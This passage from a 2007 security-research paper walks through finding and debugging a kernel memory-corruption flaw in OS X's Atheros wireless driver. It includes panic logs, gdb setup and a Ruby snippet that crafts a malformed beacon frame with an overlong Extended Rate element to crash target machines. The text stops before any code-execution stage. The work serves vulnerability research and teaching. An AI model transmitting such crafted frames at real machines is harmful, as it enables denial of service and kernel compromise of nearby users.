OS X Kernel-mode Exploitation in a Weekend September, 2007 David Maynor dave@erratasec.com http://www.erratasec.com/ Abstract: Apple's Mac OS X operating system is attracting more attention from users and security researchers alike. Despite this increased interest, there is still an apparent lack of detailed vulnerability development information for OS X. This paper will attempt to help bridge this gap by walking through the entire vulnerability development process. This process starts with vulnerability discovery and ultimately finished with a remote code execution. To help illustrate this process, a real vulnerability found in the OS X wireless device driver is used. 1) Introduction OS X has a strange place in the hearts and the minds of the research community. Security researchers, like most other users, enjoy a well-built and reliable hardware platform topped off by an operating system with a slick interface. Switch gears from the users experience to a more research-oriented focus and problems start to appear. Researchers have historically explored and documented internals of operating systems like Microsoft's Windows and open source counterparts such as Linux and BSD variants. The knowledge gaps for OS X are in no way a show stopper for researching security vulnerabilities on OS X; still, they prove to be a frustrating speed bump. While static analysis of binaries in a Windows environment may be trivial, the same cannot be said to be true on OS X. This document contains information collected from a variety of sources after discovering a flaw in a wireless device driver for OS X. Before the accidental discovery of the wireless flaw, the author knew next to nothing about the internals of OS X, the ``xnu'' kernel. Google, in a rare failure, also provided next to no help. All the articles the author encountered only narrowly covered a topic without talking about how one could go about building a useful research environment. Many of these articles talked about something each respective author discovered without showing how others could rediscover it. For this reason, the author includes tips throughout this paper in the form of sections entitled ``Things I wish Google told me''. The Test Network Many elements are required when finding and duplicating a wireless vulnerability. Since the target for the attack described in this paper is running the OS X operating system, at least two OS X machines are needed for kernel debugging with gdb (the ``GNU Debugger''). A third computer with a D-Link WDA-2320 Atheros based card is used as the attacking machine. The attacking machine uses a small Linux based distribution that runs from a CD called BackTrack2. BackTrack2 is used because it includes many special 802.11 drivers that are capable of raw packet injection, a feature that most wifi drivers (frustratingly) lack. The author's initial research on the subject described in this paper made use of a patched version of ``Madwifi-old'' with LORCON. Madwifi is the name of the open-source drivers for chipsets from Atheros. LORCON is a wifi fuzzing tool written by Josh Wright. Since quick and flexible packet generation is important, the original tool used for this research was ``scapy'', a packet creation engine written in Python. The examples in this paper, written almost one year later, make use of the Metasploit LORCON integration and are written in Ruby. To help provide some perspective on the research environment used in this document, the following three machine configurations should be referenced: Target Machine Hardware: Mac Mini, 1.66Ghz, 512MB RAM OS Version: 10.4.7 IP Address: 192.168.1.20 Role: The target machine is the victim in the testing scenario. It is running a vulnerable version of the OS X Atheros driver. Dev Machine Hardware: Macbook, 2GHz Intel Core Duo, 1 GB RAM OS Version: 10.4.7 IP Address: 192.168.1.1 Role: This machine runs gdb for connection to the target machine. It is also setup as a core dump server, but that functionality appears broken. This box will also archive the panic logs and register information along with stack traces. This is the primary machine for single step debugging. Attack Machine Hardware: Generic shuttle PC, Pentium 3, 512MB RAM OS Version: Backtrack2 Bootable Linux CD IP Address: 192.168.1.50 Role: This is the attacking machine. The attack initially launched from a Dell Laptop with a PCMCIA card. This machine is close to the same specifications with an Atheros based D-Link card. The attacks are in Ruby using the Metasploit framework integration with LORCON. 2) Vulnerability Discovery One of the major staples in a researcher's toolbox is binary analysis (where ``binary'' refers to compiled software code). Vulnerability research and discovery on OS X is no different in this regard. However, performing binary analysis on OS X requires some understanding of the underlying binary file format that is used. On OS X, Apple uses a universal binary file format called a Mach-O. In this context, a universal binary will execute on both Intel and PPC based machines. It accomplishes this by combining a compiled binary version of the program for each processor in an archive like format with a header that contains specific information relating to each processor type. The universal binary header is detected at runtime causing the correct compiled code for the platform to execute. Although universal binaries provide an elegant solution for an operating system that supports multiple architectures, it leads to problems when performing binary analysis because not many tools support the file format at the time of this writing. Recently, IDA Pro added support for the binary format in 5.1. Prior to 5.1, reversing a universal binary required manual manipulation or scripting in an IDC. Things I wish Google Told me: Disassembling OS X binaries Apple provides tools that support the manipulation of universal binaries which are capable of creating a simplified binary suitable for hassle free loading into IDA Pro. One of these tools, ``lipo'', allows a researcher to extract the relevant chunk of compiled code from a universal binary. The following gives a quick example of using lipo on the Atheros driver from OS X 10.4.7. This will create a thin file called at.i386 that is suitable for loading into IDA Pro without the confusing archive headers and with the older PowerPC code. lipo -thin i386 AirPortAtheros5424 -output at.i386 The vulnerability featured in this paper is a flaw in Apple's wireless device driver. This flaw was discovered through ``beacon'' and ``probe response'' fuzzing. Beacons are the packets that wireless access points broadcast several times a second to announce their presence to the world. They are also the packets that your notebook computer uses in order to build a list of nearby access-points. Probe-responses are similar packets that are used when a notebook computer probes for access points that are not otherwise broadcasting. The bug described in this paper was found by the author while performing fuzzing experiments against other machines. During this time, one of the Macbooks in the vicinity running OS X 10.4.6 crashed unexpectedly. This crash produced a file called panic.log in /Library/Logs. A panic.log file contains information to help debug a kernel panic or crash on OS X. This includes the output of all the registers, a stack trace and the load address of the offending module and the address of its dependent modules. This information provides a great starting place to help track down a driver problem. However, in its default form, there are several shortcomings. The most apparent shortcoming is that the stack trace does not include symbol information. As such, one sees addresses rather than function names. In order to begin to track down a problem, one needs to do some basic math to manually discover the names of the functions. Luckily, the loading offsets did not change much on the test machine when reproducing this issue. The following output shows an example panic.log: panic(cpu 0 caller 0x0019CADF): Unresolved kernel trap (CPU 0, Type 14=pagefault), registers: CR0: 0x8001003b, CR2: 0x62413863, CR3: 0x021d7000, CR4: 0x000006e0 EAX: 0x62413862, EBX: 0x00000003, ECX: 0x0c67bc8c, EDX: 0x00000003 ESP: 0x62413863, EBP: 0x0c67bad4, ESI: 0x03717804, EDI: 0x0371787c EFL: 0x00010202, EIP: 0x008c923d, CS: 0x00000008, DS: 0x0c670010 Backtrace, Format - Frame : Return Address (4 potential args on stack) 0xc67b954 : 0x128b5e (0x3bc46c 0xc67b978 0x131bbc 0x0) 0xc67b994 : 0x19cadf (0x3c18e4 0x0 0xe 0x3c169c) 0xc67ba44 : 0x197c7d (0xc67ba58 0xc67bad4 0x8c923d 0x48) 0xc67ba50 : 0x8c923d (0x48 0x10 0x1e200010 0xc670010) 0xc67bad4 : 0x8c7303 (0x371787c 0x1e202d0d 0x8 0x5) 0xc67bb24 : 0x8bccb9 (0x3699804 0xc67bc8c 0x1e202800 0x80) 0xc67bb84 : 0x8cd799 (0x369b46c 0xc67bc8c 0x1e202800 0x80) 0xc67bce4 : 0x8ddbd9 (0x369b46c 0x1e20cb00 0x36bbc04 0x80) 0xc67bd34 : 0x8ce9a5 (0x369b46c 0x1e20cb00 0x36bbc04 0x80) 0xc67be24 : 0x8de86a (0x369b46c 0x1e20cb00 0x36bbc04 0x46) 0xc67bf14 : 0x38dd6d (0x369b29c 0x354d080 0x1 0x36a7e58) 0xc67bf64 : 0x38cf19 (0x354d080 0x135d18 0x0 0x36a7e58) 0xc67bf94 : 0x38cc3d (0x3575140 0x3575140 0x0 0x450) 0xc67bfd4 : 0x197b19 (0x3575140 0x0 0x36a80d0 0x3) Backtrace terminated-invalid frame pointer 0x0 Kernel loadable modules in backtrace (with dependencies): com.apple.driver.AirPortAtheros5424(104.1)@0x8bb000 dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x672000 dependency: com.apple.iokit.IOPCIFamily(2.0)@0x563000 dependency: com.apple.iokit.IO80211Family(112.1)@0x8a2000 When an OS X driver is loaded into IDA, the offsets are all relative to 0. In order to find the address where a kernel driver crashed you subtract the last address associated with the module from the stack trace from the module load address. You then subtract 0x1000 from the result because kernel modules are loaded in a page aligned fashioned. Here is a typical panic.log from /Library/Logs created for this example. panic(cpu 1 caller 0x0019CADF): Unresolved kernel trap (CPU 1, Type 14=pagefault), registers: CR0: 0x80010033, CR2: 0x00000004, CR3: 0x02209000, CR4: 0x000006a0 EAX: 0x00000000, EBX: 0x00111111, ECX: 0x000005c3, EDX: 0x00000039 ESP: 0x00000004, EBP: 0x0c74b758, ESI: 0x00111111, EDI: 0x0345bbf0 EFL: 0x00010206, EIP: 0x0090df95, CS: 0x00000008, DS: 0x03a10010 Backtrace, Format - Frame : Return Address (4 potential args on stack) 0xc74b5d8 : 0x128b5e (0x3bc46c 0xc74b5fc 0x131bbc 0x0) 0xc74b618 : 0x19cadf (0x3c18e4 0x1 0xe 0x3c169c) 0xc74b6c8 : 0x197c7d (0xc74b6dc 0xc74b758 0x90df95 0x110048) 0xc74b6d4 : 0x90df95 (0x110048 0x2920010 0x10 0x3a10010) 0xc74b758 : 0x8f2083 (0x345a000 0x111111 0xc74b778 0x800016c3) 0xc74b7a8 : 0x9112b7 (0x36d5804 0x90df78 0x345a000 0x3a1f5a5) 0xc74b7c8 : 0x9115b9 (0x345a000 0x345a46c 0x345bdb8 0x196fc1) 0xc74b808 : 0x8dec91 (0x345a000 0x36d6800 0xc74b828 0x0) 0xc74ba08 : 0x8d600c (0x368a360 0x3a1f5a5 0x6 0x339c91) 0xc74bcb8 : 0x38e698 (0x345a000 0x8 0x3a1f5a5 0x0) 0xc74bcf8 : 0x8d5284 (0x35aa900 0x8d5c7c 0x8 0x3a1f5a5) 0xc74bd38 : 0x3a3d5c (0x345a000 0x8 0x3a1f5a5 0x0) 0xc74bd88 : 0x18a83d (0x36f8d00 0x0 0x3a1f5a4 0x22) 0xc74bdd8 : 0x12b389 (0x3a1f57c 0x39c756c 0x0 0x0) 0xc74be18 : 0x124902 (0x3a1f500 0x0 0x50 0xc74befc) 0xc74bf28 : 0x193034 (0xc74bf54 0x0 0x0 0x0) Backtrace continues... Kernel loadable modules in backtrace (with dependencies): com.apple.driver.AirPortAtheros5424(104.1)@0x8e7000 dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x873000 dependency: com.apple.iokit.IOPCIFamily(2.0)@0x57e000 dependency: com.apple.iokit.IO80211Family(112.1)@0x8ce000 com.apple.iokit.IO80211Family(112.1)@0x8ce000 dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x873000 dependency: com.apple.iokit.IOPCIFamily(2.0)@0x57e000 Kernel version: Darwin Kernel Version 8.7.1: Wed Jun 7 16:19:56 PDT 2006; root:xnu-792.9.72.obj~2/RELEASE_I386 The AirPort Atheros module has a load address of 0x8e7000 which rules out the first three entries in the stack trace as being found within this driver. The fourth entry, 0x90df95, is within the range of the driver. By performing a few quick calculations, it is possible to calculate the relative offset into the associated driver's binary: 0x90df95 - 0x8e7000 - 0x1000 = 0x25f95 Opening the driver in IDA Pro and then jumping to offset 0x25f95 will yield the following code from athcopyscanresults: __text:00025F87 mov esi, [ebp+arg_4] __text:00025F8A mov edi, eax __text:00025F8C add edi, 1BF0h __text:00025F92 mov eax, [esi+60h] __text:00025F95 movzx ecx, byte ptr [eax+4] __text:00025F99 mov eax, ecx __text:00025F9B shr al, 3 Looking at this crash log, one of the first lines quickly gives insight into how to analyze this dump: panic(cpu 1 caller 0x0019CADF): Unresolved kernel trap (CPU 1, Type 14=pagefault) A page fault usually means that some code tried to access an invalid address. In a case such as this, the CR2 register (shown with the gdb with info registers) will contain the offending address Intel processors contain a whole set of non general-purpose registers like CR2 that are used for hardware and driver debugging. These are registers that one would not normally interact with when debugging userland code. In this case, the offending address is 0x00000004. Looking at the instruction that commits the page fault one can see a dereference of EAX: movzx ecx, byte ptr [eax+4]. The EAX register is zero so the value of CR2 came from the machine adding 4 to the address of in EAX. By looking at the binary values, one can determine that this panic log was caused by a NULL pointer dereference in the wireless device driver. Although it is a bit out of the scope for this document, the three addresses that precede the Atheros address in the stack trace are: 0x128b5e panic 0x19cadf panic_trap 0x197c7d trap_from_kernel When performing OS X kernel auditing and exploit development, these three address will become a very familiar site in a panic log, so get used to ignoring the first three and starting at the fourth address. 3) The Flaw Standard exploit development techniques rarely work well when applied to kernel-level vulnerabilities. The kernel environment is much less friendly to the exploit writer than user mode. Each specific vulnerability will likely require custom techniques. The flaw described in the previous chapter was found in the driver provided by Apple in their Mac OS X version 10.4.7 on Macbooks and Mac Minis running on an Intel processor. This flaw allows an attacker to compromise and gain complete control of a targeted machine. Since the flaw requires a targeted machine to receive and process a wireless management frame, the attacker must be within range in order to transmit the frame In addition, OS X discards valid frames with a weak signal, so the attacker has to be especially close to the victim machine. As was described above, this flaw was discovered accidentally while fuzz testing other devices. The ``scapy'' fuzzing tool was used to generate wireless management frames with a random numbers of Information Elements (IEs) of random sizes that were then transmitted to the broadcast address The beacon packets sent by access points contain a number of variable-length IEs such as the advertising SSID, the list of supported speeds, the country is works in, authentication information, channels, time, timezone, and vendor-specific information, such as how to find the music containing your Zune media player. The Macbook crashed due to a page fault caused by the wireless driver during the processing of one of these fuzz packets. The panic log showed arbitrary memory corruption in the form of overwriting values in source or destination copies in memory. Three crash dumps which are described below clearly show that memory was corrupted during the handling of these fuzz packets. Example 1: Attempt to access 0x62413863: panic(cpu 0 caller 0x0019CADF): Unresolved kernel trap (CPU 0, Type 14=pagefault), registers: CR0: 0x8001003b, CR2: 0x62413863, CR3: 0x021d7000, CR4: 0x000006e0 EAX: 0x62413862, EBX: 0x00000003, ECX: 0x0c67bc8c, EDX: 0x00000003 ESP: 0x62413863, EBP: 0x0c67bad4, ESI: 0x03717804, EDI: 0x0371787c EFL: 0x00010202, EIP: 0x008c923d, CS: 0x00000008, DS: 0x0c670010 #3 0x00197c7d in trap_from_kernel () #4 0x008c923d in ieee80211_saveie () #5 0x008c7303 in sta_add () #6 0x008bccb9 in ieee80211_add_scan () #7 0x008cd799 in ieee80211_recv_mgmt () #8 0x008ddbd9 in ath_recv_mgmt () #9 0x008ce9a5 in ieee80211_input () #10 0x008de86a in ath_intr () Example 2: Attempt to access 0xcc panic(cpu 1 caller 0x0019CADF): Unresolved kernel trap (CPU 1, Type 14=pagefault), registers: CR0: 0x8001003b, CR2: 0x000000cc, CR3: 0x021d7000, CR4: 0x000006a0 EAX: 0x00000033, EBX: 0x037d8504, ECX: 0x036a4c78, EDX: 0x0360b610 ESP: 0x000000cc, EBP: 0x0c6ebea4, ESI: 0x037d8504, EDI: 0x0369b46c EFL: 0x00010206, EIP: 0x008c5f03, CS: 0x00000008, DS: 0x00000010 #3 0x00197c7d in trap_from_kernel () #4 0x008c5f03 in sta_update_notseen () #5 0x008c6ba0 in sta_pick_bss () #6 0x008bd77c in scan_next () #7 0x008bc314 in thread_call_func () Example 3: Attempt to copy from 0x41316341 eax 0xaca7000 181039104 ecx 0xc98 3224 edx 0x3263 12899 ebx 0xf 15 esp 0xc6e3714 0xc6e3714 ebp 0xc6e3758 0xc6e3758 esi 0x41316341 1093755713 edi 0xaca7000 181039104 eip 0x1933de 0x1933de eflags 0x10203 66051 cs 0x8 8 ss 0x10 16 ds 0x120010 1179664 es 0xc6e0010 208535568 fs 0x10 16 gs 0x900048 9437256 Program received signal SIGTRAP, Trace/breakpoint trap. 0x001933de in memcpy_common () 2: x/i $eip 0x1933de : repz movs DWORD PTR es:[edi],DWORD PTR ds:[esi] #0 0x001933de in memcpy_common () #1 0x03915004 in ?? () #2 0x008c6083 in sta_iterate () #3 0x008e52b7 in AirPort_Athr5424::ieee80211_notify_scan_done () #4 0x008e55b9 in AirPort_Athr5424::setSCAN_REQ () #5 0x008b2c91 in IO80211Scanner::scan () #6 0x008aa00c in IO80211Controller::execCommand () #7 0x0038e698 in IOCommandGate::runAction (this=0x3595300, inAction=0x8a9c7c , arg0=0x8, arg1=0x399aea5, arg2=0x0, arg3=0xc6e3d2c) at /SourceCache/xnu/xnu-792.9.72/iokit/Kernel/IOCommandGate.cpp:152 #8 0x008a9284 in IO80211Controller::queueCommand () Tracking down the packet that crashes a wireless driver can be frustrating because it's not necessarily the last packet to be received or transmitted. This is important when the number of packets produced and injected can be as many as several thousands per minute. Since the memory overwrites illustrated above cover an entire 32 bit value, like 0x41414141, a method to tag which packet number is responsible for the overwrite can help to cut down on this frustration. A counter for packet tracking can be inserted into packets when at generation time. There are a few specific places where storing this counter can help with packet identification. The first place is the last 4 bytes of a BSSID with the first two bytes remaining static. For example, 0xcc 0xcc 0x41 0x41 0x41 0x01 is the BSSID of the first packet sent. When the last byte of the MAC address reaches 0xff the next higher byte starts counting. As such, 0xcc 0xcc 0x41 0x41 0x01 0x01 is the BSSID for the 256th packet sent. Likewise, the fuzzer can pad the information-element buffer in the same way with a repeating pattern of 0x41 0x41 0x41 0x01 for the first packet sent. The reason for padding the value with the extra data instead of just setting them to 0x00 is related to the page faults. While 0x41 0x41 0x41 0xf1 may translate to a bad address and cause a page fault during access attempts, 0x00 0x00 0x43 0x12 may be valid and cause no problems. Since kernel panics are the primary source of isolating the flaw at this point, they need to cause a crash instead of silently allowing the kernel to continue executing. Several tests reveal that the only anomaly common to all the packets that cause overwrite is an overly long Extended Rate Element which is an IE sent by the access point to advertise additional speeds, such as 11mpb, that the access point supports. To verify this, the author changed the script so that it would generate a distinctive pattern in the Extend Rate IE. This pattern showing up in the crash dumps made it possible to prove that it was the ``Extended Rate'' IE that was the problem. The amount of the pattern found in memory made it easy to determine how much memory was corrupted. The following Ruby code shows how the packet was crafted that made it possible to come to this conclusion: ssid = Rex::Text.rand_text_alphanumeric(rand(255)) bssid = "\x61\x61\x61" + Rex::Text.rand_text(3) seq = [rand(255)].pack('n') xrate = Rex.Text.rand_pattern_create(240) frame = "\x80" + "\x00" + "\x00\x00" + "\xff\xff\xff\xff\xff\xff" + bssid + bssid + seq + Rex::Text.rand_text(8) + "\xff\xff" + Rex::Text.rand_text(2) + #ssid tag "\x00" + ssid.length.chr + ssid + #supported rates "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + #current channel "\x03" + "\x01" + channel.chr + #Xrate "\x32" + xrate.length.chr + xrate When this packet is transmitted, the victim machine will not crash right away. The vulnerable code does not process the packets the instant they are received. The packets are instead only processed when the information is needed for a scan. OS X produces a new scan every five minutes. As such, the machine may take up to five minutes to crash after receiving a corrupted packet. Pinning down this bug meant that forcing a scan would be necessary. As luck would have it, Apple provides a tool called airport for this sort of thing (located in /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources). Executing airport -z will disassociate the machine from whatever wireless access point it is currently using. Executing airport -s will force the driver to run a scan and report all access points within range. In order to crash the machine quickly after a corrupted Extended Rate IE is sent, the author ran the command airport -s -r 10000. The ``-r'' option tells the airport command to repeat an action a given number of times which, in this case, causes 10000 re-scans. Running this command would cause the machine to reliably crash in the same manner every time. This makes it possible to figure out where, precisely, the wireless driver is a crashing. In this case, the corrupted IE in the packet that is transmitted causes a crash in a memcpy called from a function named athcopyscanresults in the Apple driver. It appears that the attacker can influence where the memcpy will read from and how much data will be copied. Since an attacker can copy arbitrary data from one area of memory (such as the packet) to another area of memory, it will most likely be possible to gain code execution. If no scan is forced and the target machine is not associated with an access point, a different crash will reliably occur in a memcmp called from a function named staadd. The memcmp is meant to check to see if a BSSID is the same as one that has been stored. However, the overflow corrupts a structure so that it compares the pointer to the new BSSID against a pointer that the attacker can set. Most of the beacon intervals in the test scripts are set to 0xffff, which is a little over 67 seconds. This means that a machine that receives and adds one of these beacon packets into its scan cache is not expecting to get another update from the BSSID for a little over 67 seconds. Generally, management frame fuzzing means the creation of something like a fake beacon frame that is quickly injected and forgotten. A real AP would continue sending beacon packets to let a potential client know it is still available. A driver will wait up until its beacon interval before taking actions such as marking the AP with the missed beacon as non-preferential for connection or even removing it from the scan cache altogether. In order to have many packets processed, the author set the beacon interval time to its maximum so the driver would not get suspicious for at least 67 seconds, thus allowing time for the fake AP to go through processing. In other words, most beacons are sent with intervals of several times a second. By using the maximum interval, one only needs to send a corrupted beacon packet once a minute. If the memcmp crash does not occur during normal operations, a crash in a function called staupdate can occur. Although the specific locations that the crash occurs at within this function can be different, the crash will occur reliably with the same data if the malicious frame is the same. Analyzing these repeated crashes helps to localize where memory corruption is occurring in the code. This can include static analysis using tools like IDA Pro to read the compiled driver code. This can also include dynamic analysis such as by stepping through the code with a debugger like gdb to watch step-by-step what the driver does when it overwrites memory. Debugging a kernel driver in real-time requires setting up two machines for gdb and enabling the kernel core dump facility. There are numerous documents on how to set up live kernel debugging with gdb, so rather than rehashing the information. The specific OS X boot settings the author uses involve setting the nvram boot-args argument to debug=0xd44 panicdip=192.168.1.1 –v. This setting is the easiest for two machine debugging, however, the target machine will no longer produce a panic log. Things I Wish Google told me: kernel core dumps on Intel are broken The core kernel dumping functionality on the Intel architecture appears to be broken. Following the directions for the target and development machine yielded no core dumps. After investigating this problem, it seems to stem from the fact that the panicing machine performs no ARP resolution during a crash. The panicing machine instead forwards information to its default router. OS X expects the default router to forward this information to the core dump server. The author has found that the best way to encourage proper handling is to place the development machine on a different subnet from the target machine. Keep in mind that this information was gleaned through a series of changes and tests and observations with a network sniffer. Setting the ARP entry statically with the command arp -s did not help. 4) Debugging the Crash One of the many benefits of remote kernel debugging is the ability to view a stack back trace with symbol information. The vulnerability described in the previous chapter showed crashes in many different functions such as staadd, ath_copy_scan_results, and sta_update_not_seen. Googling these function names will reveal that many of them are present in the open source Madwifi project for Atheros based wireless hardware. They are also present in the FreeBSD net80211 project. Apple based their driver on these open-source projects. Since these projects use the BSD open-source license, Apple is not required to open their source code modifications. While the Apple Atheros driver does not exactly match the open source projects, they match close enough to make reverse engineering much easier. The source tree for the Apple Airport driver and Madwifi are so close that the same debug flags work. Using sysctl to set the debug options on either debug.net80211 or debug.athdriver will cause a flood of diagnostic information to fill /var/log/system.log. TestBox:~ root# sysctl debug debug.bpf_bufsize: 4096 debug.bpf_maxbufsize: 524288 debug.bpf_maxdevices: 256 debug.iokit: 0 debug.net80211: 0 0 debug.athdriver: 0 0 TestBox:~ root# sysctl -w debug.net80211=0xffffffff debug.net80211: 0 0 -> 2147483647 2147483647 TestBox:~ root# TestBox:~ root# tail /var/log/system.log Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 33 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 33 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 31 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 31 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 31 TestBox:~ root# One can read what each bit does and how they can be set using the debug tools found in the tools directory of the Madwifi source tree. The open-source 80211debug.c file corresponds to Apple's debug.net80211 module and athdebug.c corresponds to debug.athdriver. An enum found at the top of each debug source file defines the bit mask and what functionality it enables. You can activate all debugging functionality by setting the bit field to 0xffffffff. However, when doing this, a problem arises due to the large amount of data written to the log file. The function that performs the logging, IOLog, cannot always keep up with the flood of messages and does not know or care if a write is unsuccessful. For this reason, targeting a specific function may give more information and help to ensure that it is not buried under a wave of data. For instance, the following command will only show debug messages that involve the scanning code where this vulnerability occurs. If one does not want to remember the bit fields, the Madwifi tools required only minor tweaks to work with OS X, and the source is in the accompanying tar ball with other examples for this paper. The task of kernel debugging ultimately rests with gdb which is not well-suited for the job. Those people who learned kernel hacking with SoftICE will be unhappy with gdb. It lacks basic debugger functionality such as the ability to search through memory. Tracepoints do not work nor do hardware breakpoints. However, it makes up for the lack of built-in functionality with the ability to script and the ability to set commands to execute after a breakpoint is reached. Stringing a lot of these features together makes it possible to hack together tools that help to supplement missing features. A short list of helpful tricks discovered during the use of gdb are included in the following sections. 4.1) Ghetto Profiling Although several texts reference the ability to enable profiling by rebuilding the xnu kernel under OS X, that never seemed to work correctly for me. For this reason, the author kept a written list of interesting offsets and profile other information. For example, when you break in staadd, ECX contains a pointer to the packet that is about to parse. To use this as a ghetto profiler, the author would set a breakpoint at the beginning of staadd. Using this command's feature, a conditional is used to make sure ECX is not NULL and, if not, print the first 20 bytes of it. The debugger is then told to continue. (gdb) break sta_add Breakpoint 1 at 0x8f2e35 (gdb) commands Type your commands for when breakpoint 1 is hit, one per line. End with a line saying just "end". > if $ecx > 0x100 >x/20x $ecx >end >continue >end Every time this breakpoint is hit it will print the first 20 bytes of ECX and then continue. This is useful because when the machine does crash one can see the packet it was processing at the time. This is what it looks like when running. Breakpoint 1, 0x008f2e35 in sta_add () 2: x/i $eip 0x8f2e35 : sub esp,0x3c 0x1e34f000: 0x013a0050 0x04cb1600 0x110062a3 0xfeaffb50 0x1e34f010: 0xfb501100 0x2ef0feaf 0xf6773728 0x00000192 0x1e34f020: 0x04110064 0x68730700 0x656b6e69 0x8204016e 0x1e34f030: 0x03968b84 0x16dd0b01 0x01f25000 0x50000001 0x1e34f040: 0x000102f2 0x02f25000 0x50000001 0x060402f2 Breakpoint 1, 0x008f2e35 in sta_add () 2: x/i $eip 0x8f2e35 : sub esp,0x3c 0x1e36a000: 0x00000080 0xffffffff 0x6161ffff 0x8710ec61 0x1e36a010: 0xec616161 0xc1c08710 0xc5962377 0xa185eaae 0x1e36a020: 0xa9b1ffff 0x55441300 0x30455362 0x34634972 0x1e36a030: 0x4530614a 0x6f557678 0x82080137 0x0c968b84 0x1e36a040: 0x03483018 0xf0320b01 0x41414141 0x41414141 The first packet is a probe response which can be determined keying off the 50 that starts the packet. The integer format should be read in reverse byte-order such that 0x013a0050 is actually 0x50 0x0x3a 0x01. The next packet is 0x80 0x00 0x00 0x00 which is a beacon frame with a BSSID of 0x61 0x61 0x61 0xec 0x10 0x87. This represents a packet that was created by the packet generation script. The ghetto profiling works great on less frequently invoked breakpoints. The more hits a breakpoint receives, the greater the load to a machine. 4.2) kgmacros When gdb is started a file ``kgmacors'' should be sourced that contains a lot of useful debugging macros from the kernel debug kit. Most of these functions do not seem to work on the Intel platform. In some cases, one may get an error message stating that the command does not work with this architecture. In other cases, it may just silently fail. Although some commands like panic log are useful, other commands like showx86backtrace can actually destroy data needed for debugging. 4.3) Simplifying things There is a lot to do to get gdb setup to do live kernel debugging. One must download the correct kernel debug kit, create the correct symbols on the target machine, and move them to the debug machine. Following that, one must start gdb, import the symbols, generate a NMI on the target machine, and connect the debugger. These tasks should be automated as much as possible or one will be stuck typing the same commands repeatedly. On the target machine, the command to create the symbols for AirPortAtheros5424 is simple: Kextload -A -s /tmp/symbols /System/Library/Extensions/IO80211Family.kext/Contents/PlugIns/AirPortAtheros5424.kext This will create the required symbols in /tmp/symbols/. /tmp/symbols can be archived and transferred to the debugging machine. On the debugging machine a script will do most of the manual tasks and define a macro for connecting to the target machine. The contents of OS Xkernelsetup: file /Volumes/KernelDebugKit/mach_kernel set architecture i386 source /Volumes/KernelDebugKit/kgmacros add-symbol-file /Users/dave/symbols/com.apple.driver.AirPortAtheros5424.sym add-symbol-file /Users/dave/symbols/com.apple.iokit.IOPCIFamily.sym add-symbol-file /Users/dave/symbols/com.apple.iokit.IO80211Family.sym add-symbol-file /Users/dave/symbols/com.apple.iokit.IONetworkingFamily.sym set disassembly-flavor intel define knock target remote-kdp attach $arg0 end This script is sourced instead of running all the normal startup activities. The knock macro replaces having to type two commands every time one needs to connect to the target machine. (gdb) knock 192.168.1.20 Connected. (gdb) One thing to note about kernel debugging is that although the author has not observed this happening a lot, the module one is auditing can load at a different address which means new symbols should be generated otherwise nothing will match up correctly. From the author's experience, one can boot a machine 100 times and the module will be at the same address 99 out of 100 times, and the one time it is not a simple reboot should bring the module back to the expected address. 5) Analyzing Madwifi The madwifi source code shows that most of the crashes occur while iterating over the scan cache stored in a variable known as scanstate. To add an entry to the scan cache a function called staadd parses management frames into a structure called staentry. struct sta_entry { struct ieee80211_scan_entry base; TAILQ_ENTRY(sta_entry) se_list; LIST_ENTRY(sta_entry) se_hash; u_int8_t se_fails; /* failure to associate count */ u_int8_t se_seen; /* seen during current scan */ u_int8_t se_notseen; /* not seen in previous scan */ u_int32_t se_avgrssi; /* LPF rssi state */ unsigned long se_lastupdate; /* time of last update */ unsigned long se_lastfail; /* time of last failure */ unsigned long se_lastassoc; /* time of last association */ u_int se_scangen; /* iterator scan gen# */ }; The staadd function is too long to print here but can be found in the net80211/ieee80211scansta.c source file. In this function, an assignment is performed that sets the copy destination for all the beacon data into the base variable from staentry. ise = &se->base; The ieee80211scanentry structure is defined as the follows. Note that the Extended Rate buffer is defined as an array with a size of IEEE80211_RATE_MAX_SIZE + 2. This is much like other buffer overflows where programmers reserve fixed sized buffers in memory to hold variable length data from packets. /* * Scan cache entry format used when exporting data from a policy * module; this data may be represented some other way internally. */ struct ieee80211_scan_entry { u_int8_t se_macaddr[IEEE80211_ADDR_LEN]; u_int8_t se_bssid[IEEE80211_ADDR_LEN]; u_int8_t se_ssid[2 + IEEE80211_NWID_LEN]; u_int8_t se_rates[2 + IEEE80211_RATE_MAXSIZE]; u_int8_t se_xrates[2 + IEEE80211_RATE_MAXSIZE]; u_int32_t se_rstamp; /* recv timestamp */ union { u_int8_t data[8]; u_int64_t tsf; } se_tstamp; /* from last rcv'd beacon */ u_int16_t se_intval; /* beacon interval (host byte order */ u_int16_t se_capinfo; /* capabilities (host byte order) */ struct ieee80211_channel *se_chan;/* channel where sta found */ 